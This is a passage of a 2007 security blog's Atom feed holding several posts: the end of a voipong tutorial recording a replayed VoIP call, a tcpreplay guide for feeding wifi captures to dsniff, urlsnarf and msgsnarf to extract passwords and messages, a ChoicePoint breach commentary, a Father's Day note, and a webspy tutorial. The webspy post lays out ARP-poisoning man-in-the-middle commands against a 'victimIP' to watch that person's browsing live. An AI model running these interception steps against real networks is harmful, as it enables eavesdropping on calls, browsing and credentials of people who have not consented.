EnderUNIX VOIPONG Voice Over IP Sniffer starting...&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:32:33: Release 2.0 running on bt [Linux 2.6.20-BT-PwnSauce-NOSMP #3 Sat Feb 24 15:52:59 GMT 2007 i686]. (c) Murat Balaban http://www.enderunix.org/       8493]&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:32:33: Default matching algorithm: lfp&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:32:33: loadmodule: /usr/local/etc/voipong/modules/modvocoder_pcma.so (@0xb7f162a1)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:32:33: loadmodule: /usr/local/etc/voipong/modules/modvocoder_pcmu.so (@0xb7f1427f)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:32:33: loaded 2 module(s)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:32:33: loadnetfile: fopen(/usr/local/etc/voipong/voipongnets): No such file or directory&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:32:33: ath0 has been opened in  promisc mode. (10.1.1.0/255.255.255.0)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;All looks well.  Now its time to invoke tcpreplay so we can push our captured traffic back onto the network and view it with voipong.  NOTE: voipong will capture this traffic in real time all on its own, I had to use the method because I had a capture file with VOIP traffic.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;bt ~ # tcpreplay -i ath0 IGScallcapture.lpc&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;sending out ath0&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;processing file: IGScallcapture.lpc&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:36:11: [11222] VoIP call has been detected.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:36:11: [11222] 10.0.0.145:49604 &lt;--&gt; 10.0.0.200:49606&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:36:11: [11222] Encoding 0-PCMU-8KHz, recording.......&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:38:33: [11222] maximum idle time [10 secs] has been elapsed for this call, the call might have been ended.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:38:33: [11222] .WAV file output/20070615/session-enc0-PCMU-8KHz-10.0.0.145,49604-10.0.0.200,49606.wav has been created successfully&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:38:33: [11222] .WAV file output/20070615/session-enc0-PCMU-8KHz-10.0.0.200,49606-10.0.0.145,49604.wav has been created successfully&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:38:33: [11222] Mixed output files: output/20070615/session-enc0-PCMU-8KHz-10.0.0.145,49604-10.0.0.200,49606-mixed.wav&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:38:33: child [pid: 11222] terminated normally [exit code: 0]&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:43:39: SHUTDOWN signal caught, starting shutdown procedures...&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;15/06/07 04:43:39: PID 11039 [parent: 3047]: exited with code: 0. uptime: 7 minutes 42 seconds.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Everything looks great so far.  Let's verify log output &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;bt log # cat /var/log/voipcdr.log&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Start;End;Duration(seconds);Session Id;Party1 RTP Pair; Party 2 RTP Pair;Encoding;Rate&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Fri Jun 15 04:36:11 2007;Fri Jun 15 04:38:23 2007;132;11222;10.0.0.145:49604;10.0.0.145:49606;0;8000&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Once again, looks great.  Lets check and see if our output files are in place.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;bt output/20070615 # ls&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;session-enc0-PCMU-8KHz-10.0.0.145,49604-10.0.0.200,49606-mixed.wav  session-enc0-PCMU-8KHz-10.0.0.200,49606-10.0.0.145,49604.wav&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;session-enc0-PCMU-8KHz-10.0.0.145,49604-10.0.0.200,49606.wav&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Everything appears to be in order.  Time for playback:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;bt output/20070615 # play session-enc0-PCMU-8KHz-10.0.0.200,49606-10.0.0.145,49604.wav&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Input Filename : session-enc0-PCMU-8KHz-10.0.0.200,49606-10.0.0.145,49604.wav&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Sample Size    : 16-bits&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Sample Encoding: signed (2's complement)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Channels       : 1&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Sample Rate    : 8000&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Time: 00:48.89 [00:00.00] of 00:48.89 ( 100.0%) Output Buffer:   2.35M&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Done.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Well...that's it in a nutshell.  If you have any questions or feedback please feel free to drop me a comment.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;May Your Skill Prevail.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-2644679941671443005?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/2644679941671443005/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=2644679941671443005&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/2644679941671443005'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/2644679941671443005'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/06/using-voipong-with-backtrack-2-final.html' title='Using voipong with Back|track 2 Final'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-5469517530729168915</id><published>2007-06-17T20:29:00.000-07:00</published><updated>2007-06-17T21:13:44.190-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Father&apos;s Day'/><title type='text'>Happy Fathers Day!</title><content type='html'>&lt;style type="text/css"&gt;!--   @page { size: 8.5in 11in; margin: 0.79in }   P { margin-bottom: 0.08in }  --&gt;&lt;/style&gt;&lt;span style="font-family: verdana;font-family:verdana;font-size:100%;"  &gt;I just wanted to give a shout out to the other Fathers out there and hope that you enjoyed your day.  I know that I did, Korean BBQ and Marinated Chicken Drumettes off the grill with Arrogant Bastard Ale to wash it all down with.  Not to mention the shiny Fossil watch and other presents and accolades.&lt;/span&gt;&lt;span style="font-family: verdana;font-size:100%;" &gt;&lt;br /&gt;&lt;/span&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;"&gt;&lt;span style="font-size:100%;"&gt;Definitely a day to remember.&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-5469517530729168915?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/5469517530729168915/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=5469517530729168915&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/5469517530729168915'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/5469517530729168915'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/06/happy-fathers-day.html' title='Happy Fathers Day!'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-3826759826584901781</id><published>2007-06-15T00:45:00.000-07:00</published><updated>2007-06-17T20:32:46.338-07:00</updated><title type='text'>Getting Tcpreplay and 802.11 to Play Nice</title><content type='html'>&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 2.2  (Linux)"&gt;&lt;meta name="AUTHOR" content="igs-awilliams"&gt;&lt;meta name="CREATED" content="20070615;171500"&gt;&lt;meta name="CHANGEDBY" content="igs-awilliams"&gt;&lt;meta name="CHANGED" content="20070615;461500"&gt;              &lt;style type="text/css"&gt;  &lt;!--   @page { size: 8.5in 11in; margin: 0.79in }   P { margin-bottom: 0.08in }  --&gt;  &lt;/style&gt;  &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;Sometimes you want to be able to replay traffic to analyze it live with different tools in your arsenal. This is not really an issue with standard Ethernet but can prove to be a bit challenging when faced with 802.11 traffic. Let's take a hands on look at what I'm talking about below.&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;So you captured some wifi data (802.11) with airodump-ng like this, for example:&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt; airmon-ng start wlan0&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt; airodump-ng -w dump -c 11 wlan0&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;(Or you captured with Kismet, etc.)&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;Now you want to go back and pull out passwords, URLs, instant messages and images from your capture file: dump.cap.&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt; dsniff -r dump.cap&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;dsniff: record_init: Invalid argument&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;And the other fun programs (driftnet, msgsnarf, urlsnarf, etc.) don't read files at all, they only work in real time listening on network interfaces. Driftnet won't even listen on 802.11 interfaces in rfmon mode:&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt; driftnet -i wlan0&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;driftnet: unknown data link type 119&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;The solution: Use tcpreplay to play back the packets on a network interface so all these interesting programs can work.&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;Download the latest stable release of tcpreplay (currently tcpreplay-2.3.5.tar.gz) here:&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;http://tcpreplay.synfin.net/trac/wiki/Download&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;Install from source in the usual fashion:&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt; tar xzvf tcpreplay-2.3.5.tar.gz&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt; cd tcpreplay-2.3.5&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt;tcpreplay-2.3.5 # ./configure&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt;tcpreplay-2.3.5 # make&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt;tcpreplay-2.3.5 # make install&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;Another small problem, tcpreplay doesn't understand 802.11 headers:&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt; tcpreplay -i lo dump.cap&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;sending on: lo&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;validate_l2(): Unsupported datalink type: 802.11 (0x69)&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;Relax, airdecap-ng can convert the capture to straight Ethernet. Normally you use this program to decrypt encrypted 802.11 data, but you can also use it just to strip the 802.11 headers:&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt; airdecap-ng dump.cap&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;Total number of packets read 256828&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;Total number of WEP data packets 315&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;Total number of WPA data packets 0&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;Number of plaintext data packets 42287&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;Number of decrypted WEP packets 0&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;Number of decrypted WPA packets 0&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;This creates a file named dump-dec.cap. If you need to decrypt the data as well, just include the necessary parameters (for example -e and -w) in the airdecap-ng command.&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;Now we're going to replay the data on the local loopback Ethernet interface (lo). This gives us an interface to send the data on without actually sending it out over the air or on the local network.&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;First start your programs to listen on the local interface (in different sessions of course, so you can see the output of each):&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt; dsniff -i lo&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt; driftnet -i lo&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt; urlsnarf -i lo&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt; msgsnarf -i lo&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;Then run tcpreplay (the -R option speeds up the replay):&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;igs-awilliams@IGSLAP02~&gt; tcpreplay -i lo -R dump-dec.cap&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;sending on: lo&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;42287 packets (20751892 bytes) sent in 4.67 seconds&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;4435909.0 bytes/sec 33.84 megabits/sec 9039 packets/sec&lt;/span&gt;&lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;Each sniffer sees the packets as they are replayed on the local interface. &lt;/span&gt; &lt;/p&gt; &lt;p style="font-family: verdana;font-family:verdana;" &gt;&lt;span style="font-size:100%;"&gt;May Your Skill Prevail!&lt;/span&gt;&lt;/p&gt;     &lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 2.2  (Linux)"&gt;&lt;meta name="AUTHOR" content="igs-awilliams"&gt;&lt;meta name="CREATED" content="20070615;171500"&gt;&lt;meta name="CHANGEDBY" content="igs-awilliams"&gt;&lt;meta name="CHANGED" content="20070615;461500"&gt;              &lt;style type="text/css"&gt;  &lt;!--   @page { size: 8.5in 11in; margin: 0.79in }   P { margin-bottom: 0.08in }  --&gt;&lt;/style&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-3826759826584901781?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/3826759826584901781/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=3826759826584901781&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/3826759826584901781'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/3826759826584901781'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/06/getting-tcpreplay-and-80211-to-play.html' title='Getting Tcpreplay and 802.11 to Play Nice'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-337509343862767257</id><published>2007-06-14T21:56:00.000-07:00</published><updated>2007-06-14T21:58:29.497-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IT controls'/><category scheme='http://www.blogger.com/atom/ns#' term='FTC'/><category scheme='http://www.blogger.com/atom/ns#' term='choicepoint'/><title type='text'>Choicepoint pays...but who benefits?</title><content type='html'>&lt;p face="verdana" style="margin-bottom: 0in; font-family: verdana;"&gt;After this debacle it appears that it will culminate in what constitutes as a pass in the enterprise universe.  For more details I refer you to the link to the article below and some of my commentary on the matter.&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="color: rgb(0, 0, 128);"&gt;&lt;u&gt;&lt;a href="http://security.blogs.techtarget.com/2007/06/01/choicepoint-to-pay-500000-to-settle-with-43-states-and-dc/"&gt;http://security.blogs.techtarget.com/2007/06/01/choicepoint-to-pay-500000-to-settle-with-43-states-and-dc/&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;An interesting resolution to an obvious lack of IT controls and governance.  Furthermore the settlements and fine allocation is interesting.   Why is the FTC receiving $10 million while the states are receiving $500,000 total?   What ever happened to the actual customers whose information was carelessly handled?   A $5 million dollar redress last year?  That's it?  Where is the accountability?   Without it there is little incentive to improve security when the punishment for inappropriate conduct constitutes a slap on the wrist.&lt;/p&gt;&lt;br /&gt;&lt;span style="font-family: verdana;font-family:verdana;" &gt;What are your thoughts?&lt;/span&gt;&lt;br /&gt;&lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-337509343862767257?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/337509343862767257/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=337509343862767257&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/337509343862767257'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/337509343862767257'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/06/choicepoint-paysbut-who-benefits.html' title='Choicepoint pays...but who benefits?'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-9212202384457981273</id><published>2007-06-14T21:39:00.000-07:00</published><updated>2007-06-14T21:53:48.574-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ARP'/><category scheme='http://www.blogger.com/atom/ns#' term='mitm'/><category scheme='http://www.blogger.com/atom/ns#' term='dsniff'/><title type='text'>How to use Webspy from the dsniff suite</title><content type='html'>&lt;p style="font-family: verdana;"&gt;Webspy is an interesting tool from the dsniff family of tools including dsniff (password sniffer), arpspoof (ARP poisoning tool), dnsspoof (DNS spoofing tool), msgsnarf (view messages from IM clients), mailsnarf (view email messages), tcpkill (kill tcp connections on a local LAN), tcpnice (force other connections to "play nice" with their tcp connections) and webspy (view a targets web browsing in real time).  When properly setup it will intercept web browsing requests from the victim and display them in the attackers web browser in real time.  This post will show you how to run webspy successfully.  I am assuming a basic knowledge of the Unix command shell in addition to reading the entire man pages for all of the applications listed in this write up.&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;You will need the following tools to successfully use webspy:&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;Tested using Ubuntu 7.04 and Slackware 11.&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;An ARP spoofing application, either arpspoof or ettercap will do.&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;fragrouter or echo 1 &gt; /proc/sys/net/ipv4/ip_forward&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;Webspy&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;Web browser (Firefox 2.0.0.4 was used)&lt;/p&gt;&lt;span style="font-family: verdana;"&gt;The first step is to successfully arp poison the target as well as the gateway for the local subnet.  This can be accomplished via the use of one of two tools.  The venerable arpspoof or the more recent ettercap (which contains its own plugin that allows for remote browsing but is outside the scope of this example).  I will show both for completeness.&lt;/span&gt;  &lt;p style="font-family: verdana;"&gt;# arpspoof -i interface -t gatewayIP victimIP&lt;/p&gt; &lt;p style="font-family: verdana;"&gt;# arpspoof -i interface -t victimIP gatewayIP&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;Open these in two separate shells and run them independently of one another.  If you receive a "arpspoof: couldn't arp for host 10.1.1.1" or similar error please visit the Troubleshooting section at the end of this document.&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;To accomplish the same effect using ettercap as your ARP poisoner of choice:&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;# ettercap -i interface -Tq -M arp:remote /gatewayIP/ /victimIP/&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;At this stage you will need to open another shell and ensure that you are passing your stolen packets back onto the network.  As is normal for most things there is more than one way to accomplish this goal.  You will need to open another shell to execute these commands.&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;fragrouter -B1&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;If you do not have fragrouter or for some reason wish to pursue an alternate method of achieving the same goal you can use the following from the command line:&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;# echo 1 &gt; /proc/sys/net/ipv4/ip_forward&lt;/p&gt;&lt;span style="font-family: verdana;"&gt;You will need to open another shell/console to execute webspy:&lt;/span&gt;  &lt;p style="font-family: verdana;"&gt;# webspy -i interface victimIP&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;Well we are almost there!    You will need to start one more shell and start up your browser from the command line (starting the browser via other methods did not function correctly for me).&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;# mozilla &amp;&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;At this point if you have followed the directions correctly your broswer will start and any sites visited by the victimIP will appear in your browser in real time.&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;Troubleshooting:&lt;/p&gt;&lt;span style="font-family: verdana;"&gt;Q:&lt;/span&gt; &lt;p style="font-family: verdana;"&gt;Every time I attempt to execute arpspoof I get the following error: arpspoof: couldn't arp for host 10.1.1.1. I have tried various command line switches and nothing appears to work.&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;A;&lt;/p&gt; &lt;p style="font-family: verdana;"&gt;I received this error on my Slackware 11 installation which was compiled from source as opposed to using a package manager.  The function arp_cache_lookup does not use the correct interface when running under Linux .. it always uses interface "eth0"..  Don't fret, we can change this without too much effort.  Change directory to where you unpacked dsniff to, you will want to find the file arp.c and edit a single parameter within it.  Using your favorite editor open arp.c and change the following:&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;strncpy(ar.arp_dev, "eth0", sizeof(ar.arp_dev));&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;to&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;strncpy(ar.arp_dev, "wlan0", sizeof(ar.arp_dev));&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;Save the file and recompile the application.&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;If you have other issues, you got it running properly or you just want to drop a line feel free to leave a comment.&lt;/p&gt;  &lt;p style="font-family: verdana;"&gt;May Your Skill Prevail.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-9212202384457981273?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/9212202384457981273/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=9212202384457981273&amp;isPopup=true' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/9212202384457981273'/><link rel='self' type='application/atom+xml' 